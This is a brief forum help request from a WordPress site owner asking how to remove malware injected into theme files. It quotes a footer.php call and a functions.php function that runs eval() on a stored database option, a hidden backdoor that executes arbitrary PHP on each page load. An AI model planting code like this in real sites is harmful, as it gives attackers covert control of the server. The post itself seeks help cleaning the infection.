Help me. Malware in whole site in my hosting.
In function.php theme:
[Code moderated as per the Forum Rules. Please use the pastebin]
in my theme's footer.php:
<?php echo wp_footer_();?>
in twentyten functions.php:
<?php
function wp_footer_()
{
return @eval(get_option('blogoption'));
}
?>
Help me to remove them from my site's themes.